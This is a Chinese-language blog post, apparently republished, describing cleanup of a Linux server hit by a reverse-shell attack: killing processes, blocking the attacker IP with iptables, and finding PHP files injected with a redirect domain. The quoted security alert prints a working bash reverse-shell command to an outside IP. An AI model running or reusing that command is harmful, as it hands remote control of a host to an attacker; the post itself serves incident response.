進程異常行為-反彈Shell攻擊,KILL多個進程


進程異常行為-反彈Shell攻擊
父進程名稱:bash
進程名稱:bash
進程名稱:/usr/bin/bash
進程id:23,077
命令行參數:sh -c /bin/bash -i >& /dev/tcp/27.255.72.119/4451 0>&1
說明:黑客利用遠程代碼執行漏洞或者惡意木馬向中控服務器建立反向TCP連接,連接建立后,黑客可利用該連接遠程執行任意系統指令,嚴重危害主機安全。
解決方案:建議立即KILL該可疑反彈SHELL進程,並及時清理計划任務中的惡意代碼。
看下27.255.72.119是什么鬼?
 
 
這個IP全是邪惡文件。

首先,用ps查看進程,方法如下:

ps -ef

  

N多反彈SHELL進程需要清理。

下面利用循環kill掉進程。

ps命令將某個進程顯示出來  grep命令是查找  中間的|是管道命令 是指ps命令與grep同時執行  PS是LINUX下最常用的也是非常強大的進程查看命令  grep命令是查找,是一種強大的文本搜索工具,它能使用正則表達式搜索文本,並把匹配的行打印出來。awk '{print $2}'  $fileName :   一行一行的讀取指定的文件, 以空格作為分隔符,打印第二個字段。while read line的 循環中的重定向,done寫在最后相當於給整個while do 語句加了一個約束條件,讀取每行至文件尾。

 ps -ef | grep 27.255.72.119| awk '{print $2}'| while read line;do kill $line;done

 kill 結束不掉的時候,可以加 -9,強制

kill -9 28271

查看iptables規則,包括所有的鏈。filter表包含INPUT、OUTPUT、FORWARD三個規則鏈。  說明:-L是--list的簡寫,作用是列出規則。

iptables -L

 使用 iptables屏蔽IP段

iptables -A OUTPUT -d  27.255.72.119 -j DROP

 

#添加屏蔽IP 
#禁止此IP訪問服務器 iptables -I INPUT -s 1.2.3.4 -j DROP 或 iptables -A INPUT -s 1.2.3.4 -j DROP 
#禁止服務器訪問此IP iptables -A OUTPUT -d 1.2.3.4 -j DROP 如果要封某個網段: iptables -I INPUT -s 1.2.3.0/24 -j DROP  
#清空屏蔽IP iptables -t filter -D INPUT -s 1.2.3.4 -j DROP iptables -t filter -D OUTPUT -d 1.2.3.4 -j DROP  
#一鍵清空所有規則 iptables -F  
#查看 iptables -L INPUT 或 iptables -L 或 iptables-save(此命令將保存規則,下次開機自動執行) 

 

Netstat 是一款命令行工具,可用於列出系統上所有的網絡套接字連接情況,包括 tcp, udp 以及 unix 套接字,另外它還能列出處於監聽狀態(即等待接入請求)的套接字。

netstat -tnpla| grep ESTABLISHED| grep root

cat /etc/rc.local

百度打開主網站被跳轉鏈接了6he5566.com還彈出個QQ框,what?

find . -name "*.php" -exec grep -i  "6he5566.com" {} \;

刪除這些文件,修改相應配置conf文件,修改文件目錄權限,修復代碼漏洞。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM